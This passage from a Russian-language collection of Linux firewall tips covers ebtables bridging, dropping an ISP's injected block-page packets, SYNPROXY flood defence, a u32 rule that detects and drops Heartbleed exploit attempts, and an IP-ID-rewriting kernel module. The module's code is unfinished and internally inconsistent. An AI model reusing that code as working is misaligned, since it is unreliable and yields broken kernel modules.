сети и он и будет центральным маршрутизатором. Увы, как только вы это сделаете, всё вернётся к проблеме, описанной ранее. Правильное решение Из предыдущей главы стало понятно, что нам нужно:
прозрачный файервол;
управляющий интерфейс этого файервола сделать внешним для возможности включения туннелей для филиалов и домашних пользователей через Интернет;
озаботиться хорошей фильтрацией от атак и для него, подконфигурив файрвол;
выключить redirect;
сконфигурить все VPN-ы либо на этом хосте, либо прописать маршрут на хосте с прозрачным файерволом - центральным маршрутизатором до сервера VPN. Как ни странно, но в сети можно найти решение как это сделать, но это решение предлагается как совершенно странный нетипичный пример сети с запутанными условиями "из реальной жизни", совсем не похожей на рассматриваемый пример типичного подключения. Как это делается в других ОС, отличных от Linux оставим на самостоятельный поиск читателю, а для Linux эта строчка выглядит вот так и немного странно: ebtables -t broute -A BROUTING -i eth-in -p ipv4 -j redirect --redirect-target DROP Где eth-in - входящий интерфейс со стороны вашей остальной сети. Тот, кто уже имел дела с конфигурацией файервола на Linux, взглянув на эту строчку скажет, что мы запретили совсем необходимый переброс пакета со входящего интерфейса на выход. Да, именно так. Дело в том, что ebtables имеет много точек разветвления, запрещая одно ветвление, мы заставляем пермещать пакет в другое, если политика по умолчанию или следующие правила это не запрещают. В данном случае пакет покинет L2-уровень, за который ответсвеннен ebtables и мост, а пойдёт на L3-уровень в маршрутизацию и iptables. Посмотрите на примеры использования ebtables, вы там в большинстве случаев найдёте именно правила с DROP. Такова уж судьба у L2-уровня, другие действия нужны к ну уж очень занятны и нетипичным конфигурациям, типа кластеров и др.

Борьба с подстановкой фиктивных пакетов провайдером при помощи iptables [комментарии]

Многие провайдеры и корпоративные системы инспектирования трафика применяют подстановку пакетов, перенаправляющих браузер пользователя на страницу с информацией о блокировке, при этом не обрывая изначально установленное соединение к заблокированному ресурсу. Например, запустив tcpdump -nA -s1500 host заблокированный_IP и попытавшись отрыть заблокированный ресурс в браузере, можно увидеть такой пакет: 13:50:24.563093 IP 1.2.3.4.80 > 192.168.1.10.58072: Flags [.], seq 1777859077:1777859201, ack 3185912442, win 229, length 124 E.......2..a..x$...f.P..i.....*zP....V..HTTP/1.1 302 Found Connection: close Location: http://warning.bigprovider.ru/?id=61&st=0&dt=1.2.3.4&rs=http://badsite.com/ следом за которым приходит реальный ответ и другие пакеты с подпадающего под блокировку сайта, которые продолжают приходить и не отбрасываются провайдером. Данный метод блокировки обусловлен тем, что оборудование для обеспечения блокировки хоть и имеет доступ к транзитному трафику, но оно работает обособленно от сетевой инфраструктуры и не может изменять трафик или напрямую блокировать прохождение пакетов. Соответственно, суть применяемого провайдерами метода состоит в том, что блокирующее оборудование зная параметры сетевого соединения реализует блокировку через отправку подставного упреждающего ответа. Так как такой фиктивный ответ приходит раньше реального ответа от удалённого сервера и снабжён корректным номером последовательности TCP, он воспринимается клиентским ПО в первую очередь, а пришедший хвост реального ответа игнорируется. Обойти подобную блокировку достаточно легко при помощи добавления на локальной Linux-системе правила, отбрасывающего фиктивный ответ: iptables -I INPUT -p tcp --sport 80 -m string --string "Location: http://warning.bigprovider.ru" --algo bm -j DROP В случае HTTPS (подобным образом также часто блокируют Tor) блокировка обычно устраивается через подстановку в трафик RST-пакетов для принудительного обрыва соединения. Обходится данное ограничение следующим правилом: iptables -I INPUT -p tcp --sport 443 --tcp-flags RST RST -j DROP Итог: Даже самые крупные провайдеры лукавят и вместо полноценной блокировки применяют сомнительные методы подстановки трафика, не блокируя фактически запрещённый трафик. Таким образом, описанная выше техника не может рассматриваться как метод обхода блокировки, так как блокировки нет как таковой - пакеты с запрещённых ресурсов не блокируются и продолжают приходить на клиентскую систему, а приходящие от провайдера вкрапления лишь создают видимость блокировки и организуют проброс на стороне клиента. Клиент имеет полное право отбрасывать любые пакеты на своей системе и это не может рассматриваться как лазейка для обхода блокировки, которая не выполнена должным образом провайдером. Дополнение: Для выявления описанного выше вида блокировок можно использовать утилиту curl, в которой можно увидеть "хвост" реального ответа: $ curl -i --ignore-content-length http://badsite.org/ HTTP/1.1 302 Found Connection: close Location: http://warning.bitprovider.ru/?id=6&st=0&dt=1.2.3.4&rs=http://badsite.org/ 8 Location: http://badsite.org/forum/index.php Connection: keep-alive ... Если запросить конечную страницу, то можно получить её содержимое без манипуляций с iptables: $ curl -i --ignore-content-length --trace-asci dump.txt http://badsite.org/forum/index.php HTTP/1.1 302 Found Connection: close Location: http://warning.bigprovider.ru/?id=6&st=0&dt=1.2.3.4&rs=http://badsite.org/forum/index.php ection: keep-alive 1fc0 ...содержимое HTML-документа. $ less dump.txt ... <= Recv header, 20 bytes (0x14) 0000: HTTP/1.1 302 Found <= Recv header, 19 bytes (0x13) 0000: Connection: close <= Recv header, 101 bytes (0x65) 0000: Location: http://warning.bigprovider.ru/?id=6&st=0&dt=1.2.3.4&rs=h 0040: ttp://badsite.org/forum/index.php <= Recv header, 2 bytes (0x2) 0000: <= Recv data, 1238 bytes (0x4d6) 0000: ection: keep-alive ...

Борьба с SYN-флудом при помощи iptables и SYNPROXY (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Начиная с ядра Linux 3.12 и инструментария IPTables 1.4.21 в iptables доступна поддержка новой цели - SYNPROXY, позволяющей в десятки раз увеличить интенсивность обработки SYN-пакетов при противостоянии таким атакам, как SYN Flood, SYN-ACK Flood и ACK Flood. Например, если в обычной конфигурации ядра сервер на базе CPU Xeon X5550 способен обработать приблизительно 200 тысяч SYN- или ACK-пакетов в секунду, то при включении SYNPROXY производительность возрастает до нескольких миллионов, чего достаточно для отражения небольших атак без привлечения специализированного оборудования. Включаем в /etc/sysctl.conf syncookies и timestamps, так как они необходимы для работы SYNPROXY: sysctl -w net/ipv4/tcp_syncookies=1 sysctl -w net/ipv4/tcp_timestamps=1 Исключаем ACK-пакеты из обработки системой отслеживания соединений (отслеживаем только уже установленные соединения, ACK-пакеты снабжаются меткой INVALID), что помогает снизить нагрузку при ACK-флуде: sysctl -w net/netfilter/nf_conntrack_tcp_loose=0 Увеличивает размер хэша для отслеживания соединений: echo 2500000 > /sys/module/nf_conntrack/parameters/hashsize sysctl -w net/netfilter/nf_conntrack_max=2000000 Исключаем SYN-пакеты из обработки в системе отслеживания соединений (таблица raw обрабатывает соединений без их отслеживания, а опция "--notrack" позволяет обойти цель CT ("conntrack")): iptables -t raw -I PREROUTING -p tcp -m tcp --syn -j CT --notrack Выделяем SYN- и ACK-пакеты без отслеживания (UNTRACKED и INVALID), как в прошлом правиле и направляем их в цель SYNPROXY, в которой будет выполнена проверка syncookies и если всё нормально установлено TCP-соединение: iptables -I INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460 Отбрасываем все остальные пакеты, не прошедшие проверку в прошлом правиле: iptables -A INPUT -m conntrack --ctstate INVALID -j DROP Если необходимо обеспечить защиту для отдельного IP, правила можно изменить следующим образом (если атака ведётся только на 80 сетевой порт, можно добавить "--dport 80"): iptables -t raw -I PREROUTING -p tcp -m tcp -d 192.168.1.10 --syn -j CT --notrack iptables -I INPUT -p tcp -m tcp -d 192.168.1.10 -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460 iptables -A INPUT -m conntrack --ctstate INVALID -j DROP Для просмотра статистики: iptables -t raw -vnL cat/proc/net/stat/synproxy Если нужно на низком уровне заблокировать некоторые HTTP-запросы, явно связанные с проведением атаки, можно использовать следующее правило (маску можно выделить из логов или через "tcpdump -nnA dst host 192.168.1.10 and port http"): iptables -A INPUT -p tcp --dport 80 -m string --string "маска_блокировки" --algo bm -j DROP

Отключение Firewalld и возвращение к iptables в RHEL/CentOS 7 Автор: Базиль [комментарии]

Использование применяемой по умолчанию в RHEL/CentOS 7 надстройки Firewalld не всегда очевидно, поэтому бывает удобнее вернуться к классическим скриптам работы с пакетным фильтром. Установим классические сервисы для работы с iptables: yum install -y iptables-services Настраиваем правила фильтрации в файлах /etc/sysconfig/iptables и /etc/sysconfig/iptables-config, например, можно сохранить текущие правила firewalld: iptables-save > /etc/sysconfig/iptables Завершаем работу firewalld и запускаем сервисы iptables: systemctl stop firewalld && systemctl start iptables Проверяем, что используются новые правила: iptables -S iptables -L Для восстановления резервной копии типовых правил с другой машины можно воспользоваться командой iptables-restore: cat iptables.backup| iptables-restore -t service iptables save (или /usr/libexec/iptables/iptables.init save) для возвращения настроек из /etc/sysconfig/iptables: systemctl reload iptables Если всё нормально убираем активацию Firewalld при загрузке и запрещаем ручной запуск: systemctl disable firewalld systemctl mask firewalld Активируем включение сервисов iptables при загрузке: systemctl enable iptables

Блокирование попыток эксплуатации heartbeat-уязвимости в OpenSSL средствами iptables (доп. ссылка 1) [комментарии]

Пример блокирования критической уязвимости CVE-2014-0160 в OpenSSL 1.0.1, позволяющей получить содержимое памяти удалённых серверных и клиентских приложений. Отражаем в логе все heartbeat-запросы при помощи iptables и модуля u32: iptables -t filter -A INPUT -p tcp --dport 443 -m u32 --u32 "52=0x18030000:0x1803FFFF" -j LOG --log-prefix "BLOCKED: HEARTBEAT" Блокируем heartbeat-запросы: iptables -t filter -A INPUT -p tcp --dport 443 -m u32 --u32 "52=0x18030000:0x1803FFFF" -j DROP Отслеживаем возможные атаки при помощи Wireshark: tshark -i interface port 443 -R 'frame[68:1] == 18' tshark -i interface port 443 -R 'ssl.record.content_type == 24'

Использование xtables-модуля xt_bpf для фильтрации через BPF в Linux Автор: Roman Timofeev [комментарии]

В ядре Linux 3.9 добавили xt_bpf - аналог нетграф-ноды ng_bpf из FreeBSD. Без использования правил iptables на платформе x86_64 BPF-правило демонстрирует производительность 40K (40 GBps) netperf TCP_STREAM, после вставки 100 BPF-правил производительность составляет 28K. Используемое BPF-правило: iptables -A OUTPUT -m bpf --bytecode '6,40 0 0 14, 21 0 3 2048,48 0 0 25,21 0 1 20,6 0 0 96,6 0 0 0,' -j При использовании 100 эквивалентных правил через u32 производительность составляет 21K: iptables -A OUTPUT -m u32 --u32 '6&0xFF=0x20' -j DROP Т.е. для достаточно приличного числа ситуаций можно получить как упрощение правил, так и их ускорение (тем более, что на некоторых платформах доступен net.core.bpf_jit_enable и инструкции bpf преобразуются в нативный код). Для желающих использовать в более старых ядрах, доступен патч для ядра и патч для iptables. В оригинале, для формирования байткода BPF автор модуля использует компилятор (который просто вызывает libpcap), хотя всё что нужно можно получить от tcpdump, указав ему подходящий интерфейс с DLT_RAW (для чего прекрасно подходит создаваемый после загрузки модуля ipip.ko интерфейс tunl0). Пример использования: modprobe ipip tcpdump -i tunl0 -ddd 'udp' > udp.bpf tcpdump -i tunl0 -ddd 'icmp' > icmp.bpf iptables -A INPUT -m bpf --bytecode-file udp.bpf -j LOG --log-prefix "udp: " iptables -A INPUT -m bpf --bytecode-file icmp.bpf -j LOG --log-prefix "icmp: " В dmesg мы увидим: [17453.963938] udp: IN=eth0 OUT= MAC=00:15:17:14:c8:c3:00:30:4f:64:71:92:08:00 SRC=192.168.100.1 DST=192.168.100.2 LEN=237 TOS=0x00 PREC=0x00 TTL=64 ID=63634 PROTO=UDP SPT=53 DPT=8516 LEN=217 [17460.203403] icmp: IN=eth0 OUT= MAC=00:15:17:14:c8:c3:00:30:4f:64:71:92:08:00 SRC=192.168.100.1 DST=192.168.100.2 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=18090 SEQ=1

Использование нескольких сетевых стеков в Linux Автор: Roman Timofeev ( ^rage^ ) [комментарии]

В linux относительно давно появилась такая замечательная вещь, как неймспейсы (namespaces). Основное применение данной технологии - контейнерная виртуализация, но и на маршрутизаторе можно придумать много разных применений, так как среди неймспейсов есть "network namespaces". Network namespaces позволяют в рамках одной машины в каждом неймспейсе иметь:
свой набор таблиц маршрутизации (а их 2^31-1 шт)
свою arp-таблицу
свои правила iptables
свои устройства (а значит и qdisc + class'ы tc) NB: для выполнения нижеследующих примеров крайне желательно иметь свежий iproute2 и ядро. Создаются неймспейсы достаточно скучно и просто: ip netns add VROUTER ip netns add KUKYSEVRACI Создадим "виртуальны шнурок": ip link add name ve0a type veth peer name ve0b Добавим интерфейсы внутрь VROUTER: ip link set dev eth0 netns VROUTER ip link set dev ve0b netns VROUTER Выполнить команду в контексте определённого неймспейса можно так: ip netns exec VROUTER ip link show Настроим адреса: ip netns exec VROUTER ip a a 192.168.1.1/24 dev ve0b ip a a 192.168.1.2/24 dev ve0a ip netns exec VROUTER ip a a 10.140.48.16/24 dev eth0 Поднимем интерфейсы: ip link set dev ve0a up ip netns exec VROUTER ip link set dev eth0 up ip netns exec VROUTER ip link set dev ve0b up Шлюз по умолчанию: ip netns exec VROUTER ip r a default via 10.140.48.1 Посмотрим, что получилось: root@laptus:~# ip netns exec VROUTER ip r s default via 10.140.48.1 dev eth0 10.140.48.0/24 dev eth0 proto kernel scope link src 10.140.48.16 192.168.1.0/24 dev ve0b proto kernel scope link src 192.168.1.1 Добавим NAT: ip netns exec VROUTER iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to-source 10.140.48.16 Сделаем пару трейсов: root@laptus:~# ip netns exec VROUTER traceroute -q 1 -I opennet.ru traceroute to opennet.ru (77.234.201.242), 30 hops max, 60 byte packets 1 10.140.48.1 (10.140.48.1) 0.148 ms 2 10.140.0.1 (10.140.0.1) 0.245 ms 3 border.yournet.ru (91.204.148.17) 0.436 ms 4 alisa.yournet.ru (91.204.151.2) 0.521 ms 5 sev-gw.yournet.ru (91.204.148.2) 8.975 ms 6 bl16-1-gw.spb.runnet.ru (194.190.255.25) 1.321 ms 7 bl16-1-gw.spb.runnet.ru (194.85.40.170) 1.785 ms 8 s14-1-gw.spb.runnet.ru (194.85.40.81) 1.456 ms 9 vuztc.spb.runnet.ru (194.190.255.170) 1.987 ms 10 opennet.ru (77.234.201.242) 2.395 ms root@laptus:~# traceroute -q 1 -I opennet.ru traceroute to opennet.ru (77.234.201.242), 30 hops max, 60 byte packets 1 192.168.1.1 (192.168.1.1) 0.094 ms 2 10.140.48.1 (10.140.48.1) 0.751 ms 3 10.140.0.1 (10.140.0.1) 1.277 ms 4 border.yournet.ru (91.204.148.17) 2.061 ms 5 alisa.yournet.ru (91.204.151.2) 2.911 ms 6 sev-gw.yournet.ru (91.204.148.2) 6.770 ms 7 bl16-1-gw.spb.runnet.ru (194.190.255.25) 3.622 ms 8 bl16-1-gw.spb.runnet.ru (194.85.40.170) 5.262 ms 9 s14-1-gw.spb.runnet.ru (194.85.40.81) 4.135 ms 10 vuztc.spb.runnet.ru (194.190.255.170) 4.710 ms 11 opennet.ru (77.234.201.242) 7.220 ms

Интерактивный firewall в Linux Автор: tux2002 [комментарии]

Linux обладает отличными средствами фильтрации сетевого трафика, но обычно в нём строят статический firewall. В данной статье я опишу идею и реализацию интерактивного firewall, который в случае подозрительной активности выводит пользователю окно с предложением блокирования трафика или игнорирования предупреждения. Рассмотрим следующую заготовку firewall, которую в дальнейшем можно обучать интерактивно: cat slackwall.initstate # Generated by iptables-save v1.4.10 on Sat Dec 3 21:42:46 2011 *filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] :FIREWALL-INPUT - [0:0] :FIREWALL-FORWARD - [0:0] :FIREWALL-OUTPUT - [0:0] -A INPUT -m state --state INVALID -j REJECT --reject-with icmp-port-unreachable -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -p icmp -j ACCEPT -A INPUT -j FIREWALL-INPUTFIREWALL-INPUT -A INPUT -j LOG --log-prefix "FIREWALL-INPUT " -A INPUT -j REJECT --reject-with icmp-port-unreachable -A FORWARD -m state --state INVALID -j REJECT --reject-with icmp-port-unreachable -A FORWARD -p icmp -j ACCEPT -A FORWARD -p udp -m udp --dport 53 -j ACCEPT -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT -A FORWARD -j FIREWALL-FORWARD -A FORWARD -j LOG --log-prefix "FIREWALL-FORWARD " -A FORWARD -j REJECT --reject-with icmp-port-unreachable -A OUTPUT -m state --state INVALID -j REJECT --reject-with icmp-port-unreachable -A OUTPUT -p icmp -j ACCEPT -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A OUTPUT -j FIREWALL-OUTPUT -A OUTPUT -j LOG --log-prefix "FIREWALL-OUTPUT " -A OUTPUT -j REJECT --reject-with icmp-port-unreachable COMMIT # Completed on Sat Dec 3 21:42:46 2011 В трёх основных цепочках мы сначала запрещаем обрывки соединений, потом разрешаем уже установленные соединения, DNS и ICMP трафик. Далее пакеты перенаправляются в одну из трёх обучаемых цепочек: FIREWALL-INPUT FIREWALL-OUTPUT FIREWALL-FORWARD откуда пакеты, для которых не нашлось правила возвращаются в одну из основных цепочек и ЛОГИРУЮТСЯ а затем отклоняются ПО УМОЛЧАНИЮ. В цепочке FIREWALL-OUTPUT для персонального firewall лучше держать только одно разрешающее правило для всего трафика, иначе обучение становится трудоёмким. Таким образом пакет в обучаемой цепочке шлибо обрабатывается с соответствующим решением, либо попадает в LOG firewall`а и отклоняется. То есть строки о "необученных пакетах" можно регулярно считывать, парсить, предлагать решение пользователю и вносить новые правила в обучаемые цепочки. Например если есть некий shell сценарий обработки SYSLOG, можно выполнить от рута: tail -n 1 -f /var/log/syslog | ./slackwall В данном примере обработчик - скрипт slackwall. Вот его текст: #!/bin/sh while read string do echo $string | grep FIREWALL > /dev/null || continue for token in $string do echo $token | grep "=" > /dev/null && export $token echo $token | grep "FIREWALL" > /dev/null && export CHAIN=$token done [ -z "$IN" ] && unset SRC [ -z "$OUT" ] && unset DST HSRC=`host $SRC 2>/dev/null | grep "domain name pointer" | awk '{ print $5 }'` HDST=`host $DST 2>/dev/null | grep "domain name pointer" | awk '{ print $5 }'` echo $PROTO | grep "^[[:digit:]]*$" > /dev/null && unset DPT PROTO=`cat /etc/protocols | grep "[[:space:]]$PROTO[[:space:]]" | awk '{ print $1 }'` HPROTO=`cat /etc/services | grep -i "[[:space:]]$DPT/$PROTO"` HSRC=${HSRC:-$SRC} HDST=${HDST:-$DST} HPROTO=${HPROTO:-"$DPT/$PROTO"} unset IHSRC IHDST ISRC IDST IDPT IPROTO [ -z "$HSRC" ] || IHSRC="-s $HSRC" [ -z "$HDST" ] || IHDST="-d $HDST" [ -z "$SRC" ] || ISRC="-s $SRC" [ -z "$DST" ] || IDST="-d $DST" [ -z "$DPT" ] || IDPT="--dport $DPT" IPROTO="-p $PROTO" cat slackwall.userules | grep "iptables -A $CHAIN $IPROTO $IHSRC $IHDST $IDPT -j" \\ && echo Alredy && continue cat slackwall.userules | grep "iptables -A $CHAIN $IPROTO $ISRC $IHDST $IDPT -j" \\ && echo Alredy && continue cat slackwall.userules | grep "iptables -A $CHAIN $IPROTO $IDPT -j" \\ && echo Alredy && continue unset COMMAND ACTION=6 LANG=C xmessage -buttons BlockFQDN:1,BlockIP:2,AcceptFQDN:3,AcceptIP:4,BlockPortOnAllIP:5,Skip:6 \\ -default Skip -timeout 15 "$HSRC => $HDST ($HPROTO)" ACTION=$? [ $ACTION == 0 ] && continue [ $ACTION == 1 ] && COMMAND="iptables -A $CHAIN $IPROTO $IHSRC $IHDST $IDPT -j REJECT" [ $ACTION == 2 ] && COMMAND="iptables -A $CHAIN $IPROTO $ISRC $IDST $IDPT -j REJECT" [ $ACTION == 3 ] && COMMAND="iptables -A $CHAIN $IPROTO $IHSRC $IHDST $IDPT -j ACCEPT" [ $ACTION == 4 ] && COMMAND="iptables -A $CHAIN $IPROTO $ISRC $IDST $IDPT -j ACCEPT" [ $ACTION == 5 ] && COMMAND="iptables -A $CHAIN $IPROTO $IDPT -j REJECT" [ $ACTION == 6 ] && continue $COMMAND [ "$?" == 0 ] && echo "$COMMAND" >> slackwall.userules done Он парсит строки SYSLOG и рисует на экране пользователя вопрос с помощью xmessage и затем добавляет правило в ядро и дублирует его в сценарий slackwall.userules, предназначенный для начальной инициализации firewall. Вот его начальное состояние: #!/bin/bash modprobe nf_conntrack modprobe nf_conntrack_amanda modprobe nf_conntrack_ftp modprobe nf_conntrack_h323 modprobe nf_conntrack_irc modprobe nf_conntrack_netbios_ns modprobe nf_conntrack_netlink modprobe nf_conntrack_pptp modprobe nf_conntrack_proto_dccp modprobe nf_conntrack_proto_gre modprobe nf_conntrack_proto_sctp modprobe nf_conntrack_proto_udplite modprobe nf_conntrack_sane modprobe nf_conntrack_sip modprobe nf_conntrack_tftp modprobe xt_conntrack iptables -F FIREWALL-INPUT iptables -F FIREWALL-FORWARD iptables -F FIREWALL-OUTPUT iptables -A FIREWALL-OUTPUT -j ACCEPT Для начального запуска firewall нужно выполнить: 1. Разрешаем руту рисовать на X сервере (выполняется от пользователя, остальное всё от рута) $xhost +localhost 2. Загружаем неизменяемую часть firewall #cat slackwall.initstate | iptables-restore 3. Загружаем пользовательские правила, в дальнейшем их можно отредактировать и перезапустить эту комманду #./slackwall.userules 4. Запускаем скрипт обучения: #tail -n 1 -f /var/log/syslog | ./slackwall У меня это работает в таком виде на Slackware 13.37, Linux psc 2.6.37.6-tinyslack Atom(TM) CPU D510 @ 1.66GHz GenuineIntel GNU/Linux. Ссылка на готовый пакет: https://sourceforge.net/projects/slackwall/

Создание модуля для iptables, изменяющего ID пакета (доп. ссылка 1) Автор: xlise [комментарии]

Данная статья основывается на материале "Разработка Match-модуля для iptables своими руками" (http://www.linuxjournal.com/article/7184), но код работает на ядрах 2.6.20+. Мне потребовалось изменить ID IP пакетов, в интернете подходящей инструкции как это сделать на ядре 2.6.24 я не нашел, из-за этого решил написать, как удалось решить задачу. Для реализации задуманного нам понадобится написать модуль ядра, который будет выполнять проверку и модуль расширения для iptables, который будет работать с модулем ядра - создавать новые цепочки, использующие наш модуль, выводить информацию о критерии при выводе списка правил на экран, а также проверять корректность передаваемых модулю параметров. Сначала создадим общий заголовочный файл ipt_ID.h: #ifndef _IPT_ID_H #define _IPT_ID_H enum { IPT_ID_RAND = 0, IPT_ID_INC }; #define IPT_ID_MAXMODE IPT_ID_INC struct ipt_ID_info { u_int8_t mode; u_int16_t id; }; #endif Теперь скопируем его в исходники netfilter в директорию linux/netfilter_ipv4/ Далее рассмотрим модуль ядра ipt_ID.с. #include <linux/module.h> #include <linux/skbuff.h> #include <linux/ip.h> #include <net/checksum.h> #include <linux/random.h> #include <linux/netfilter/x_tables.h> #include <linux/netfilter_ipv4/ipt_ID.h> MODULE_AUTHOR("Xlise <demonxlise@gmail.com>"); MODULE_DESCRIPTION("Xtables: IPv4 ID field modification target"); MODULE_LICENSE("GPL"); static int count=0; static struct iphdr l_iph[5]; static unsigned int id_tg(struct sk_buff *skb, const struct net_device *in, const struct net_device *out, unsigned int hooknum, const struct xt_target *target, const void *targinfo) { struct iphdr *iph; const struct ipt_ID_info *info = targinfo; u_int16_t new_id; int i=0; if (!skb_make_writable(skb, skb->len)) return NF_DROP; iph = ip_hdr(skb); switch (info->mode) { case IPT_ID_RAND: get_random_bytes(&info->id, sizeof(info->id)); new_id = info->id; break; case IPT_ID_INC: while (i<5) { if (l_iph[i].daddr == iph->daddr) { new_id = l_iph[i].id + htons(1); l_iph[i].id = new_id; } else {new_id = iph->id; l_iph[count] = *iph; count++; if (count > 4) count = 0; } i++; } default: new_id = iph->id; break; } if (new_id != iph->id) { csum_replace2(&iph->check, iph->id, new_id); iph->id = new_id; } return XT_CONTINUE; } static bool id_tg_check(const char *tablename, const void *e, const struct xt_target *target, void *targinfo, unsigned int hook_mask) { const struct ipt_ID_info *info = targinfo; if (info->mode > IPT_ID_MAXMODE) { printk(KERN_WARNING "ipt_ID: invalid or unknown Mode %u\n", info->mode); return false; } if (info->mode != IPT_ID_SET && info->id == 0) return false; return true; } static struct xt_target id_tg_reg __read_mostly = { .name = "ID", .family = AF_INET, .target = id_tg, .targetsize = sizeof(struct ipt_ID_info), .table = "mangle", .checkentry = id_tg_check, .me = THIS_MODULE, }; static int __init id_tg_init(void) { return xt_register_target(&id_tg_reg); } static void __exit id_tg_exit(void) { xt_unregister_target(&id_tg_reg); } module_init(id_tg_init); module_exit(id_tg_exit); Напишем Makefile для нашего модуля: obj-m := ipt_ID.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) $(MAKE) -C $(KDIR) M=$(PWD) modules добавим модуль в ядро insmod ipt_ID.ko Для создания модуля для iptables нам потребуются исходники для iptables-1.4.4 Создадим файл libipt_ID.c #include <stdio.h> #include <string.h> #include <stdlib.h> #include <getopt.h> #include <xtables.h> #include <linux/netfilter_ipv4/ipt_ID.h> #define IPT_ID_USED 1 static void ID_help(void) { printf( "ID target options\n" " --id-rand value Set ID to \n" " --id-inc value Increment ID by \n"); } static int ID_parse(int c, char **argv, int invert, unsigned int *flags, const void *entry, struct xt_entry_target **target) { struct ipt_ID_info *info = (struct ipt_ID_info *) (*target)->data; u_int16_t value; if (*flags & IPT_ID_USED) { xtables_error(PARAMETER_PROBLEM, "Can't specify ID option twice"); } if (!optarg) xtables_error(PARAMETER_PROBLEM, "ID: You must specify a value"); if (xtables_check_inverse(optarg, &invert, NULL, 0)) xtables_error(PARAMETER_PROBLEM, "ID: unexpected `!'"); if (!xtables_strtoui(optarg, NULL, &value, 0, UINT16_MAX)) xtables_error(PARAMETER_PROBLEM, "ID: Expected value between 0 and 255"); switch (c) { case '1': info->mode = IPT_ID_RAND; break; case '2': if (value == 0) { xtables_error(PARAMETER_PROBLEM, "ID: increasing by 0?"); } info->mode = IPT_ID_INC; break; default: return 0; } info->id = value; *flags |= IPT_ID_USED; return 1; } static void ID_check(unsigned int flags) { if (!(flags & IPT_ID_USED)) xtables_error(PARAMETER_PROBLEM, "TTL: You must specify an action"); } static void ID_save(const void *ip, const struct xt_entry_target *target) { const struct ipt_ID_info *info = (struct ipt_ID_info *) target->data; switch (info->mode) { case IPT_ID_SET: printf("--id-set "); break; case IPT_ID_DEC: printf("--id-dec "); break; case IPT_ID_INC: printf("--id-inc "); break; } printf("%u ", info->id); } static void ID_print(const void *ip, const struct xt_entry_target *target, int numeric) { const struct ipt_ID_info *info = (struct ipt_ID_info *) target->data; printf("ID "); switch (info->mode) { case IPT_ID_SET: printf("set to "); break; case IPT_ID_DEC: printf("decrement by "); break; case IPT_ID_INC: printf("increment by "); break; } printf("%u ", info->id); } static const struct option ID_opts[] = { { "id-set", 1, NULL, '1' }, { "id-inc", 1, NULL, '2' }, { .name = NULL } }; static struct xtables_target id_tg_reg = { .name = "ID", .version = XTABLES_VERSION, .family = NFPROTO_IPV4, .size = XT_ALIGN(sizeof(struct ipt_ID_info)), .userspacesize = XT_ALIGN(sizeof(struct ipt_ID_info)), .help = ID_help, .parse = ID_parse, .final_check = ID_check, .print = ID_print, .save = ID_save, .extra_opts = ID_opts, }; void _init(void) { xtables_register_target(&id_tg_reg); } Далее скопируем файл ipt_ID.h в iptables-1.4.4/include/linux/netfilter_ipv4/ и файл libipt_ID.c в iptables-1.4.4/extensions/ теперь скомпилируем iptables и скопируем файл iptables-1.4.4/extensions/libipt_ID.so в /lib/xtables/ Теперь можно создавать цепочки в iptables пример: iptables -t mangle -A POSTROUTING -j ID --id-rand 1 Будет выдавть всем пакетам случайные ID (единица в конце ничего не обозначает просто я не доделал модуль) iptables -t mangle -A POSTROUTING -j ID --id-inc 1 Будет пакетам направленным на один IP присваивать ID постоянно увеличивая на единицу, может хранить в памяти пять таких цепочек (количество цепочек можно увеличить) P.S. Если кого интересует данная тема, то я доделаю статью и допишу модуль, просто пока всё работает и так не хочется ничего переделывать, но если нужно сделаю.

Совместное использование SELinux и iptables (доп. ссылка 1) [комментарии]

Используя утилиту Secmark можно организовать назначение в правилах iptables SELinux-меток для сетевых пакетов, примерно также как осуществляется назначение меток для локальных системных ресурсов. Подобное может использоваться для предотвращения доступа сторонних процессов, не находящихся под контролем SELinux, к определенному классу пакетов. Например, можно указать что запросы на 80 порт (метка http_packet_t) может отправлять только определенный web-браузер (или процесс, имеющий SELinux-метку http_t) и никто иной. По умолчанию все сетевые пакеты снабжаются меткой unlabeled_t, а для всех подконтрольных процессов активируется правило, без ограничений разрешающее отправку и прием пакетов: allow MYDOMAIN unlabed_t:packet { send recv }; При назначении меток для трафика при помощи Secmark разрешительная политика по отношению к unlabed_t может привести к тому, что в случае отключения пакетного фильтра или в момент его перезапуска, правила блокирования будут временно проигнорированы. Попытаемся отключить автоматическую установку метки unlabeled_t, которая назначается в Fedora Linux через SELinux-модуль unlabelednet. Если отключить данный набор SELinux-политик, то все подконтрольные SELinux приложения потеряют возможность отправлять и принимать пакеты с меткой unlabeled_t. Чтобы вернуть таким программам возможность работы в сети для них необходимо подготовить соответствующие SELinux-правила и пометить пакеты. Для усиления защиты ноутбука было решено подготовить простые SELinux-политики, запрещающие обращаться к внешним сетевым ресурсам всем системным сервисам, ограниченным при помощи SELinux. Всем программ, запущенные в рамках сессии пользователя, разрешено обращаться как ко внутренним, так и к внешним сетевым ресурсам. Подготовлено три политики доступа к сети: internal_packet_t: Iptables помечает меткой internal_packet_t все пакеты, отправленные в локальную сеть или приходящие на текущую машину из локальной сети; dns_external_packet_t: Iptables помечает меткой dns_external_packet_t все внешние обращения к DNS-серверам (udp/tcp порт 53); external_packet_t: Iptables помечает меткой external_packet_t все остальные пакеты, не подпадающие под первые два правила; Для упрощения генерации iptables-правил для назначения SELinux-меток был создан скрипт secmarkgen: #!/bin/sh -e init() { # This just tells iptables to apply the same label to incoming packets as it did on outgoing echo $IPTABLES -F -t security echo $IPTABLES -t security -A INPUT -m state --state ESTABLISHED,RELATED -j CONNSECMARK --restore # Apply a label even if its on another port but is related echo $IPTABLES -t security -A OUTPUT -m state --state ESTABLISHED,RELATED -j CONNSECMARK 